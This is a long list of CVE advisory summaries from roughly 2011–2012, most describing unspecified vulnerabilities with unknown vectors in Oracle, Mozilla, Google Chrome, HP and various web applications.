Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The nsWindow implementation in the browser engine in Mozilla Firefox before 3.6.28 and 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird before 3.1.20 and 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 does not check the validity of an instance after event dispatching, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, as demonstrated by Mobile Firefox on Android.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.6.28 and 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird before 3.1.20 and 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.6.26 and 4.x through 9.0, Thunderbird before 3.1.18 and 5.0 through 9.0, and SeaMonkey before 2.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Stack-based buffer overflow in the Novell NCP implementation in NetIQ eDirectory 8.8.7.x before 8.8.7.2 allows remote attackers to have an unspecified impact via unknown vectors.
Unspecified vulnerability in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote attackers to obtain an administrator cookie and bypass authorization checks via unknown vectors.
Directory traversal vulnerability in EMC RSA enVision 4.x before 4.1 Patch 4 allows remote authenticated users to have an unspecified impact via unknown vectors.
EMC RSA enVision 4.x before 4.1 Patch 4 uses unspecified hardcoded credentials, which makes it easier for remote attackers to obtain access via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Oracle Grid Engine component in Oracle Sun Products Suite 6.1 and 6.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to qrsh.
Unspecified vulnerability in HP System Management Homepage (SMH) before 7.0 allows remote authenticated users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP OpenVMS 7.3-2 on the Alpha platform, 8.3 and 8.4 on the Alpha and IA64 platforms, and 8.3-1h1 on the IA64 platform allows local users to cause a denial of service via unknown vectors.
Distributed Computing Environment (DCE) 1.8 and 1.9 on HP HP-UX B.11.11 and B.11.23 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in HP Performance Manager 9.00 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the WBEM implementation in HP HP-UX 11.11 and 11.23 allows remote attackers to obtain access to diagnostic information via unknown vectors, a related issue to CVE-2012-0125.
Unspecified vulnerability in the WBEM implementation in HP HP-UX 11.31 allows local users to obtain access to diagnostic information via unknown vectors, a related issue to CVE-2012-0126.
Unspecified vulnerability in HP Data Protector Express (aka DPX) 5.0.00 before build 59287 and 6.0.00 before build 11974 allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Data Protector Express (aka DPX) 5.0.00 before build 59287 and 6.0.00 before build 11974 allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1498.
Unspecified vulnerability in HP Data Protector Express (aka DPX) 5.0.00 before build 59287 and 6.0.00 before build 11974 allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1393.
Unspecified vulnerability in HP Data Protector Express (aka DPX) 5.0.00 before build 59287 and 6.0.00 before build 11974 allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1392.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization 4.1 allows local users to affect confidentiality and integrity via unknown vectors related to Shared Folders.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web, a different vulnerability than CVE-2012-0086 and CVE-2012-0095.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect availability via unknown vectors related to Web.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization 4.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Windows Guest Additions.
Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.0.1 and 3.1.1 allows remote attackers to affect availability via unknown vectors related to Web Container.
Unspecified vulnerability in Oracle Solaris 11 Express allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
Unspecified vulnerability in Oracle Solaris 9, 10, and 11 Express allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kerberos.
Unspecified vulnerability in Oracle Solaris 9, 10, and 11 Express allows remote attackers to affect availability via unknown vectors related to sshd.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows local users to affect availability via unknown vectors related to Kernel, a different vulnerability than CVE-2011-0813.
Unspecified vulnerability in Oracle Solaris 11 Express allows local users to affect confidentiality via unknown vectors related to ksh93 Shell.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows remote attackers to affect availability via unknown vectors related to Network.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web, a different vulnerability than CVE-2012-0086 and CVE-2012-0108.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect integrity via unknown vectors related to Web, a different vulnerability than CVE-2012-0071.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Web, a different vulnerability than CVE-2012-0090.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52.05 allows remote authenticated users to affect integrity and availability via unknown vectors related to Upgrade Change Assistance.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Web, a different vulnerability than CVE-2012-0092.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to ePerformance.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 8.9, 9.0, and 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Benefits Administration.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web, a different vulnerability than CVE-2012-0095 and CVE-2012-0108.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2 and 10.1.3.5.1 allows remote attackers to affect integrity via unknown vectors related to Content Server.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2, 10.1.3.5.1, 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote authenticated users to affect integrity via unknown vectors related to Content Server.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2, 10.1.3.5.1, 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Search.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.1.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Administration.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Talent Acquisition Management.
Unspecified vulnerability in Oracle OpenSSO 7.1 and 8.0 allows remote attackers to affect integrity via unknown vectors related to Administration.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft Products 9.0 and 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to ePerformance.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise CRM component in Oracle PeopleSoft Products 8.9 allows remote authenticated users to affect integrity via unknown vectors related to Sales.
Unspecified vulnerability in the Oracle Forms component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Listener component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect integrity via unknown vectors related to Web, a different vulnerability than CVE-2012-0093.
Multiple SQL injection vulnerabilities in signature.php in the Advanced Forum Signatures (aka afsignatures) plugin 2.0.4 for MyBB allow remote attackers to execute arbitrary SQL commands via the (1) afs_type, (2) afs_background, (3) afs_showonline, (4) afs_bar_left, (5) afs_bar_center, (6) afs_full_line1, (7) afs_full_line2, (8) afs_full_line3, (9) afs_full_line4, (10) afs_full_line5, or (11) afs_full_line6 parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the tooltips in LimeSurvey before 1.91+ Build 11379-20111116, when viewing survey results, allows remote attackers to inject arbitrary web script or HTML via unknown parameters.
Unspecified vulnerability in the Connections plugin before 0.7.1.6 for WordPress has unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in wordpress_sentinel.php in the Sentinel plugin 1.0.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in logout.php in Cacti before 0.8.7i allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Directory traversal vulnerability in the PXE Mtftp service in Hitachi JP1/ServerConductor/DeploymentManager before 08-55 Japanese and before 08-51 English allows remote attackers to read arbitrary files via unknown vectors.
Untrusted search path vulnerability in Effective File Search 6.7 allows local users to gain privileges via a Trojan horse ztvunrar36.dll file in the current working directory, as demonstrated by a directory that contains a .efs file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in FotoSlate 4.0 Build 146 allows local users to gain privileges via a Trojan horse dwmapi.dll file in the current working directory, as demonstrated by a directory that contains a .plp file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in ACDSee Photo Editor 2008 5.x build 291 allow local users to gain privileges via a Trojan horse (1) Wintab32.dll or (2) CV11-DialogEditor.dll file in the current working directory, as demonstrated by a directory that contains a .apd file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in ACDSee Picture Frame Manager 1.0 Build 81 allows local users to gain privileges via a Trojan horse ShellIntMgrPFMU.dll file in the current working directory, as demonstrated by a directory that contains a .jpg file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.07 and possibly earlier allow remote attackers or authenticated users to inject arbitrary web script or HTML via the (1) ipaddress or (2) domain parameter to setup-network.php, different vectors than CVE-2011-5149.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 2.3.20 and probably earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tf_name, (2) tf_delegation, and (3) tf_ip parameters to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in MyBB before 1.6.5 has unknown impact and attack vectors, related to an "unparsed user avatar in the buddy list."
The Antivirus component in Comodo Internet Security before 5.3.175888.1227 does not check whether X.509 certificates in signed executable files have been revoked, which has unknown impact and remote attack vectors.
The Antivirus component in Comodo Internet Security before 5.3.175888.1227 does not properly check whether unspecified X.509 certificates are revoked, which has unknown impact and remote attack vectors.
Unspecified vulnerability in AdAstrA TRACE MODE Data Center allows remote attackers to read arbitrary files via unknown vectors, as demonstrated by the GLEG Agora SCADA+ Exploit Pack for Immunity CANVAS.
Unspecified vulnerability in Movable Type 4.x before 4.36 and 5.x before 5.05 allows remote attackers to read or modify data via unknown vectors.
Stack-based buffer overflow in Final Draft 8 before 8.02 allows remote attackers to execute arbitrary code via a crafted SmartType element, a different vulnerability than CVE-2011-5002.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in hitCode hitAppoint 4.5.17 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the username parameter to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Piwik 1.2 through 1.4 allows remote attackers with the view permission to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in the bazaar repository adapter in Redmine 0.9.x and 1.0.x before 1.0.5 allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in the bazaar repository adapter in Redmine 1.0.x before 1.0.5 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Network Automation 7.5x, 7.6x, 9.0, and 9.10 allows remote attackers to execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 16.0.912.63 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS.  NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in the Web Workers implementation in Opera before 11.60 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
Unspecified vulnerability in Opera before 11.60 has unknown impact and attack vectors, related to a "moderately severe issue."
Multiple unspecified vulnerabilities in Google Chrome before 16.0.912.44 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Unspecified vulnerability in the PRC component in Adobe Reader and Acrobat 9.x before 9.4.7 on Windows, Adobe Reader and Acrobat 9.x through 9.4.6 on Mac OS X, Adobe Reader and Acrobat 10.x through 10.1.1 on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011.
query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
The RV30 codec in RealNetworks RealPlayer before 15.0.0 and Mac RealPlayer before 12.0.0.1703 does not initialize an unspecified index value, which allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the RV20 codec in RealNetworks RealPlayer before 15.0.0 and Mac RealPlayer before 12.0.0.1703 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the ATRC codec in RealNetworks RealPlayer before 15.0.0 and Mac RealPlayer before 12.0.0.1703 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Managed Printing Administration before 2.6.4 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Database Archiving Software 6.31 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1263.
Unspecified vulnerability in HP Database Archiving Software 6.31 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1214.
Unspecified vulnerability in HP Database Archiving Software 6.31 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1213.
Unspecified vulnerability in HP Operations Agent 11.00 and Performance Agent 4.73 and 5.0 on AIX, HP-UX, Linux, and Solaris allows local users to bypass intended directory-access restrictions via unknown vectors.
Unspecified vulnerability in System Administration Manager (SAM) in EMS before A.04.20.11.04_01 on HP HP-UX B.11.11, B.11.23, and B.11.31 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Directories Support for ProLiant Management Processors 3.10 and 3.20 for Integrated Lights-Out iLO2 and iLO3 allows remote authenticated users to obtain sensitive information via unknown vectors.
An unspecified ActiveX control in SVUIGrd.ocx in ARC Informatique PcVue 6.0 through 10.0, FrontVue, and PlantVue allows remote attackers to modify files via calls to unknown methods.
Unspecified vulnerability in Twilight Frontier Touhou Hisouten 1.06 and earlier allows remote attackers to cause a denial of service (daemon crash) via unknown network traffic.
dtsoftbus01.sys in DAEMON Tools Lite before 4.41.3, Pro Standard before 4.41.0315, and Pro Advanced before 4.41.0315 allows local users to cause a denial of service (system crash) via an invalid DeviceIoControl request to \\.\dtsoftbusctl.
Unspecified vulnerability in the Drag Drop Mass Upload (ameos_dragndropupload) extension 2.0.2 and earlier for TYPO3 allows remote attackers to upload arbitrary files via unknown vectors.
Unspecified vulnerability in nxconfigure.sh in NoMachine NX Node 3.x before 3.5.0-4 and NX Server 3.x before 3.5.0-5 allows local users to read arbitrary files via unknown vectors.
Buffer overflow in the locale implementation in Google Chrome before 17.0.963.46 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Skia, as used in Google Chrome before 16.0.912.77, does not perform all required initialization of values, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Heap-based buffer overflow in the tree builder in Google Chrome before 16.0.912.77 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Heap-based buffer overflow in libxml2, as used in Google Chrome before 16.0.912.75, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Stack-based buffer overflow in FileWatcher in Google Chrome before 16.0.912.63 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The internationalization (aka i18n) functionality in Google V8, as used in Google Chrome before 16.0.912.63, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write.
Google V8, as used in Google Chrome before 15.0.874.121, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write operation.
Google Chrome before 15.0.874.102 does not properly restrict access to internal Google V8 functions, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Heap-based buffer overflow in the Web Audio implementation in Google Chrome before 15.0.874.102 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in Google Chrome before 15.0.874.102 allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to editing operations in conjunction with an unknown plug-in.
Google Chrome before 15.0.874.102 does not prevent use of an unspecified special character as a delimiter in HTTP headers, which has unknown impact and remote attack vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in Wuzly 2.0 allow remote attackers to hijack the authentication of administrators for requests that (1) add an administrator, (2) perform cross-site scripting (XSS), (3) perform SQL injection, or have other unspecified impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors that trigger a compartment mismatch associated with the nsDOMMessageEvent::GetData function, and unknown other vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 7.0 and Thunderbird 7.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Heap-based buffer overflow in the ldns_rr_new_frm_str_internal function in ldns before 1.6.11 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Resource Record (RR) with an unknown type containing input that is longer than a specified length.
Unspecified vulnerability in Oracle Communications Unified 7.0 allows local users to affect confidentiality and integrity via unknown vectors related to Calendar Server.
Unspecified vulnerability in Oracle Communications Unified 7.0 allows remote authenticated users to affect availability via unknown vectors related to Calendar Server.
Unspecified vulnerability in the Virtual Desktop Infrastructure (VDI) component in Oracle Virtualization 3.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Session.  NOTE: this CVE identifier was accidentally used for a Concurrency issue in Java Runtime Environment, but that issue has been reassigned to CVE-2012-0507.
Unspecified vulnerability in Oracle Communications Unified 7.0 allows local users to affect confidentiality via unknown vectors related to Calendar Server.
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect confidentiality via unknown vectors related to Web Services Security.
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Services Security.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4, 10.0.2, 10.3.3, 10.3.4, and 10.3.5 allows remote attackers to affect availability via unknown vectors related to Web Container.
Unspecified vulnerability in Oracle Communications Unified 7.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Calendar Server.
Unspecified vulnerability in Oracle GlassFish Enterprise Server 2.1.1 allows local users to affect confidentiality via unknown vectors related to Administration.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote attackers to affect confidentiality and availability via unknown vectors related to Sound.
Unspecified vulnerability in the Portal component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JavaFX 2.0 allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Communications Server 2.0; GlassFish Enterprise Server 2.1.1, 3.0.1, and 3.1.1; and Sun Java System App Server 8.1 and 8.2 allows remote attackers to affect availability via unknown vectors related to Web Container.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE, and 7 allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote attackers to affect integrity via unknown vectors related to Networking.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JavaFX 2.0 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
Unspecified vulnerability in Oracle Solaris 10 and 11 Express allows local users to affect availability via unknown vectors related to Kernel/Performance Counter BackEnd Module (pcbe).
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows local users to affect availability via unknown vectors related to Outside In Filters.
Unspecified vulnerability in Oracle Solaris 10 and 11 Express allows local users to affect availability via unknown vectors related to Zones.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows local users to affect availability via unknown vectors related to Kernel/Filesystem.
Unspecified vulnerability in the Solaris component in Oracle Sun Products Suite 8, 9, 10, and 11 Express allows remote attackers to affect availability via unknown vectors related to Remote Quota Server (rquotad).
